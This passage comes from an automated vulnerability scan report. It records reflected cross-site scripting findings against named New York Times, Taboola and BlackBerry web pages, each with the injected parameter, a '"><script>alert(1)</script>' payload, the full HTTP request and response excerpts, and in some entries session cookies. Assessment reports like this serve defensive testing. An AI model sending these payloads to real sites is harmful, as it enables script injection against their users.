...[SNIP]...
eature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=college+footbal;college+basketball;NCAA+tournament;Bowl+Championship+Series;sports;football;basketball;college;basketball;ryan-rossiter;siena&src=twrd5691\"><script>alert(1)</script>08b3c1d1199">
...[SNIP]...

3.284. http://thequad.blogs.nytimes.com/2010/11/12/weekly-pick-em-crunch-time-in-the-sec/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thequad.blogs.nytimes.com
Path:   /2010/11/12/weekly-pick-em-crunch-time-in-the-sec/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dc77"><script>alert(1)</script>ce27dbd6175 was submitted in the src parameter. This input was echoed as 8dc77\"><script>alert(1)</script>ce27dbd6175 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/weekly-pick-em-crunch-time-in-the-sec/?src=twr8dc77"><script>alert(1)</script>ce27dbd6175 HTTP/1.1
Host: thequad.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:39:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://thequad.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
ketball;NCAA+tournament;Bowl+Championship+Series;sports;football;basketball;college;alabama;clemson;florida;florida-state;kansas-state;mississippi-state;missouri;rutgers;south-carolina;syracuse&src=twr8dc77\"><script>alert(1)</script>ce27dbd6175">
...[SNIP]...

3.285. http://tmagazine.blogs.nytimes.com/2010/11/12/look-of-the-moment-v-b-s-tangerine-dream/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tmagazine.blogs.nytimes.com
Path:   /2010/11/12/look-of-the-moment-v-b-s-tangerine-dream/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db33e"><script>alert(1)</script>7bc29736afe was submitted in the src parameter. This input was echoed as db33e\"><script>alert(1)</script>7bc29736afe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/look-of-the-moment-v-b-s-tangerine-dream/?src=twrdb33e"><script>alert(1)</script>7bc29736afe HTTP/1.1
Host: tmagazine.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:39:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://tmagazine.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 36551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
on;first+class;gossip;hotel;jetset;luxury;menswear;models;New+York+Times;restaurant;runway;shopping;style;T+Magazine;travel;womens+wear;chanel;look-of-the-moment;victoria-beckham;womens-fashion&src=twrdb33e\"><script>alert(1)</script>7bc29736afe">
...[SNIP]...

3.286. http://topics.blogs.nytimes.com/tag/after-deadline/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.blogs.nytimes.com
Path:   /tag/after-deadline/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 538c1"><script>alert(1)</script>33f2657a714 was submitted in the REST URL parameter 2. This input was echoed as 538c1\"><script>alert(1)</script>33f2657a714 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/after-deadline538c1"><script>alert(1)</script>33f2657a714/ HTTP/1.1
Host: topics.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:40:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://topics.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:40:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/topics/tag/after-deadline538c1\"><script>alert(1)</script>33f2657a714&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.287. http://topics.blogs.nytimes.com/tag/bees/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.blogs.nytimes.com
Path:   /tag/bees/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f7d9"><script>alert(1)</script>139d110fd84 was submitted in the REST URL parameter 2. This input was echoed as 3f7d9\"><script>alert(1)</script>139d110fd84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/bees3f7d9"><script>alert(1)</script>139d110fd84/ HTTP/1.1
Host: topics.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:40:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://topics.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:40:19 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/topics/tag/bees3f7d9\"><script>alert(1)</script>139d110fd84&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.288. http://topics.blogs.nytimes.com/tag/coffee/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.blogs.nytimes.com
Path:   /tag/coffee/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5aade"><script>alert(1)</script>ce75b991a24 was submitted in the REST URL parameter 2. This input was echoed as 5aade\"><script>alert(1)</script>ce75b991a24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/coffee5aade"><script>alert(1)</script>ce75b991a24/ HTTP/1.1
Host: topics.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:40:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://topics.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:40:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/topics/tag/coffee5aade\"><script>alert(1)</script>ce75b991a24&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.289. http://topics.blogs.nytimes.com/tag/composting/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.blogs.nytimes.com
Path:   /tag/composting/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19572"><script>alert(1)</script>1061098e34e was submitted in the REST URL parameter 2. This input was echoed as 19572\"><script>alert(1)</script>1061098e34e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/composting19572"><script>alert(1)</script>1061098e34e/ HTTP/1.1
Host: topics.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:40:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://topics.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:40:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/topics/tag/composting19572\"><script>alert(1)</script>1061098e34e&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.290. http://trc.taboolasyndication.com/dispatch [item-type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /dispatch

Issue detail

The value of the item-type request parameter is copied into the HTML document as plain text between tags. The payload 1f2ba<script>alert(1)</script>e093212c051 was submitted in the item-type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /dispatch?publisher=nytimes&item-id=1248069317962&item-type=video1f2ba<script>alert(1)</script>e093212c051&pv=2&list-size=0&list-id=rplayer-during&origin=null&embed=0&external=http%3A//www.nytimes.com/&item-url=http%3A//video.nytimes.com/%3Fsrc%3Dhp1-0-V&uim=rplayer-during&uiv=default&page-id=80ab38ba1e8e581f72cae91ce7ff0cd936b19079&cv=4-4-3-41205-615264&fpv=WIN%2010%2C1%2C102%2C64&uid=a90e6082-a924-455c-a0f4-77ae13a81d64&sd=v1_637e7811ab7fa197989ae1a9b598edbc_a90e6082-a924-455c-a0f4-77ae13a81d64_1289612703_1289612703 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://admin.brightcove.com/[[IMPORT]]/cdn.taboolasyndication.com/libtrc/nytimes/brightcove.swf
x-flash-version: 10,1,102,64
Content-Type: text/xml
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: trc.taboolasyndication.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: taboola_user_id=a90e6082-a924-455c-a0f4-77ae13a81d64; taboola_session_id_nytimes=v1_637e7811ab7fa197989ae1a9b598edbc_a90e6082-a924-455c-a0f4-77ae13a81d64_1289612703_1289612703; JSESSIONID=.prod2-f3; taboola_wv_nytimes=5137589206294179436; taboola_rii_nytimes=8016263378632544135_4537852984848739616
Content-Length: 23

taboola-recommendations

Response

HTTP/1.1 500 No enum const class com.taboola.model.general.RecommendableItem$ItemType.video1f2ba<script>alert(1)</script>e093212c051
Date: Sat, 13 Nov 2010 03:19:03 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: taboola_user_id=a90e6082-a924-455c-a0f4-77ae13a81d64;Path=/;Expires=Sun, 13-Nov-11 03:19:03 GMT
Set-Cookie: taboola_session_id_nytimes=v1_583b3362a472a2627d6a30c1783790d3_a90e6082-a924-455c-a0f4-77ae13a81d64_1289618343_1289618343;Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 4176

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 500 No enum const class com.taboola.model.general.RecommendableItem$ItemType.video1f2ba&lt;script&g
...[SNIP]...
<pre>java.lang.IllegalArgumentException: No enum const class com.taboola.model.general.RecommendableItem$ItemType.video1f2ba<script>alert(1)</script>e093212c051
   at java.lang.Enum.valueOf(Enum.java:196)
   at com.taboola.model.general.RecommendableItem$ItemType.valueOf(RecommendableItem.java:69)
   at com.taboola.trc.data.TextRelatedContentDataSource.getItemType(
...[SNIP]...

3.291. http://trc.taboolasyndication.com/dispatch [list-id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /dispatch

Issue detail

The value of the list-id request parameter is copied into the HTML document as plain text between tags. The payload 6a9b2<script>alert(1)</script>6a5c31bb245 was submitted in the list-id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /dispatch?publisher=nytimes&item-id=1248069317962&item-type=video&pv=2&list-size=0&list-id=rplayer-during6a9b2<script>alert(1)</script>6a5c31bb245&origin=null&embed=0&external=http%3A//www.nytimes.com/&item-url=http%3A//video.nytimes.com/%3Fsrc%3Dhp1-0-V&uim=rplayer-during&uiv=default&page-id=80ab38ba1e8e581f72cae91ce7ff0cd936b19079&cv=4-4-3-41205-615264&fpv=WIN%2010%2C1%2C102%2C64&uid=a90e6082-a924-455c-a0f4-77ae13a81d64&sd=v1_637e7811ab7fa197989ae1a9b598edbc_a90e6082-a924-455c-a0f4-77ae13a81d64_1289612703_1289612703 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://admin.brightcove.com/[[IMPORT]]/cdn.taboolasyndication.com/libtrc/nytimes/brightcove.swf
x-flash-version: 10,1,102,64
Content-Type: text/xml
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: trc.taboolasyndication.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: taboola_user_id=a90e6082-a924-455c-a0f4-77ae13a81d64; taboola_session_id_nytimes=v1_637e7811ab7fa197989ae1a9b598edbc_a90e6082-a924-455c-a0f4-77ae13a81d64_1289612703_1289612703; JSESSIONID=.prod2-f3; taboola_wv_nytimes=5137589206294179436; taboola_rii_nytimes=8016263378632544135_4537852984848739616
Content-Length: 23

taboola-recommendations

Response

HTTP/1.1 500 unsupported request id: rplayer-during6a9b2<script>alert(1)</script>6a5c31bb245, for publisher: PublisherVariant:nytimes(default)
Date: Sat, 13 Nov 2010 03:19:24 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: taboola_user_id=a90e6082-a924-455c-a0f4-77ae13a81d64;Path=/;Expires=Sun, 13-Nov-11 03:19:24 GMT
Set-Cookie: taboola_session_id_nytimes=v1_5f9fb141c896026bdb2479f9cb355c72_a90e6082-a924-455c-a0f4-77ae13a81d64_1289618364_1289618364;Path=/
Set-Cookie: taboola_wv_nytimes=5137589206294179436;Path=/;Expires=Sun, 13-Nov-11 03:19:24 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 4092

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 500 unsupported request id: rplayer-during6a9b2&lt;script&gt;alert(1)&lt;/script&gt;6a5c31bb245, fo
...[SNIP]...
<pre>com.taboola.trc.vhf.exceptions.VHFConfigurationException: unsupported request id: rplayer-during6a9b2<script>alert(1)</script>6a5c31bb245, for publisher: PublisherVariant:nytimes(default)
   at com.taboola.trc.vhf.viewsHandler.GeneralViewsProducer.handleViewRequest(GeneralViewsProducer.java:336)
   at com.taboola.trc.vhf.viewsHandler.Publis
...[SNIP]...

3.292. http://trc.taboolasyndication.com/dispatch [publisher parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /dispatch

Issue detail

The value of the publisher request parameter is copied into the HTML document as plain text between tags. The payload 9c7e4<script>alert(1)</script>87753534a2b was submitted in the publisher parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /dispatch?publisher=nytimes9c7e4<script>alert(1)</script>87753534a2b&item-id=1248069317962&item-type=video&pv=2&list-size=0&list-id=rplayer-during&origin=null&embed=0&external=http%3A//www.nytimes.com/&item-url=http%3A//video.nytimes.com/%3Fsrc%3Dhp1-0-V&uim=rplayer-during&uiv=default&page-id=80ab38ba1e8e581f72cae91ce7ff0cd936b19079&cv=4-4-3-41205-615264&fpv=WIN%2010%2C1%2C102%2C64&uid=a90e6082-a924-455c-a0f4-77ae13a81d64&sd=v1_637e7811ab7fa197989ae1a9b598edbc_a90e6082-a924-455c-a0f4-77ae13a81d64_1289612703_1289612703 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://admin.brightcove.com/[[IMPORT]]/cdn.taboolasyndication.com/libtrc/nytimes/brightcove.swf
x-flash-version: 10,1,102,64
Content-Type: text/xml
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: trc.taboolasyndication.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: taboola_user_id=a90e6082-a924-455c-a0f4-77ae13a81d64; taboola_session_id_nytimes=v1_637e7811ab7fa197989ae1a9b598edbc_a90e6082-a924-455c-a0f4-77ae13a81d64_1289612703_1289612703; JSESSIONID=.prod2-f3; taboola_wv_nytimes=5137589206294179436; taboola_rii_nytimes=8016263378632544135_4537852984848739616
Content-Length: 23

taboola-recommendations

Response

HTTP/1.1 500 Invalid publisher name in recommendation request: nytimes9c7e4<script>alert(1)</script>87753534a2b
Date: Sat, 13 Nov 2010 03:18:40 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Connection: close
Content-Length: 3332

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 500 Invalid publisher name in recommendation request: nytimes9c7e4&lt;script&gt;alert(1)&lt;/script
...[SNIP]...
<pre>com.taboola.trc.vhf.exceptions.VHFConfigurationException: Invalid publisher name in recommendation request: nytimes9c7e4<script>alert(1)</script>87753534a2b
   at com.taboola.trc.vhf.adaptor.RecommendationClientAdaptor.dispatchPrehandling(RecommendationClientAdaptor.java:716)
   at com.taboola.trc.vhf.adaptor.RecommendationClientAdaptor.httpClientRequest(Reco
...[SNIP]...

3.293. http://us.blackberry.com/smartphones/blackberrytorch.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /smartphones/blackberrytorch.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98692"><script>alert(1)</script>768e34e7928 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /smartphones/98692"><script>alert(1)</script>768e34e7928 HTTP/1.1
Host: us.blackberry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 13 Nov 2010 03:18:34 GMT
Date: Sat, 13 Nov 2010 03:18:34 GMT
Content-Length: 21670
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/98692"><script>alert(1)</script>768e34e7928/" />
...[SNIP]...

3.294. http://video.nytimes.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38b95"><script>alert(1)</script>9c567e08122 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?src=hp1-0-V&38b95"><script>alert(1)</script>9c567e08122=1 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: video.nytimes.com
Proxy-Connection: Keep-Alive
Cookie: up=AB8GAb1e20SA09Nj; zFN=ABD4ABC3AB810AB0830A00803; zFD=ABD4ABC3AB810AB0830A00803; RMID=00c3216817494cddd04d311a; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616236837:ss=1289616226962; rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ups=ABD1gU1d20SA06nv; news_people_toolbar=NO; adxcs=-|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:19:20 GMT
Content-type: text/html
Cache-Control: private
Content-Length: 233440

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/?src=hp1-0-V&38b95"><script>alert(1)</script>9c567e08122=1">
...[SNIP]...

3.295. http://video.nytimes.com/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52977"><script>alert(1)</script>b211311428d was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?src=hp1-0-V52977"><script>alert(1)</script>b211311428d HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: video.nytimes.com
Proxy-Connection: Keep-Alive
Cookie: up=AB8GAb1e20SA09Nj; zFN=ABD4ABC3AB810AB0830A00803; zFD=ABD4ABC3AB810AB0830A00803; RMID=00c3216817494cddd04d311a; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616236837:ss=1289616226962; rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ups=ABD1gU1d20SA06nv; news_people_toolbar=NO; adxcs=-|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:19:04 GMT
Content-type: text/html
Cache-Control: private
Content-Length: 233436

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/?src=hp1-0-V52977"><script>alert(1)</script>b211311428d">
...[SNIP]...

3.296. http://video.nytimes.com/video/2010/10/15/dining/1248068993504/quick-preserved-lemons.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/15/dining/1248068993504/quick-preserved-lemons.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1952e"><script>alert(1)</script>8858d469260 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/15/dining/1248068993504/quick-preserved-lemons.html?1952e"><script>alert(1)</script>8858d469260=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
